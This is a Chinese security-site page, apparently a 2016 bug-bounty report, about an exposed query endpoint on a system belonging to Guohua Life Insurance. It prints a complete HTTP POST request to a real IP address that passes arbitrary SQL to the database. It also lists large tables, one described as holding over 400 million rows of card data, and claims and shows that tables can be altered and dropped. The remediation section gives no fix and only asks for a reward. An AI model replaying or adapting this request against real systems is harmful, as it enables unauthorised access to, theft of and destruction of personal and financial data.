首页 > 安全 > 网站安全 >

国华人寿某系统漏洞可造成千万用户数据泄漏

2016-01-05

威胁到数据库了,求20rank http: 59 151 39 90 indexlis jspPOST http: 59 151 39 90 common easyQueryVer3 EasyQueryXML jsp HTTP 1 1Accept: * *Accept-Language: zh-cnReferer: http

威胁到数据库了,求20rank

http://59.151.39.90/indexlis.jsp

QQ截图20151204144332.png

POST http://59.151.39.90/common/easyQueryVer3/EasyQueryXML.jsp HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://59.151.39.90
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 59.151.39.90
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=TZ1ZVhvFYRp6sLg8J6nlhM6VpdK6bHF8YThhnwv94RVk8tXt2ybY!1837005527

strSql=select TABLE_NAME,NUM_ROWS from tabs&strStart=1&LargeFlag=0

QQ截图20151204144402.png

大于500万行的表有

QQ截图20151204144511.png


LCCONTPLANDUTYPARAM|461959308 4亿多的卡数据

LBCONT|19298087

QQ截图20151204144814.png

QQ截图20151204145002.png


还可以增删改表

QQ截图20151204145106.png


QQ截图20151204145155.png



删测试表

QQ截图20151204145224.png

解决方案:

你看如果把数据库都删了,那危害该多严重啊,求评20rank

相关文章
最新文章
热点推荐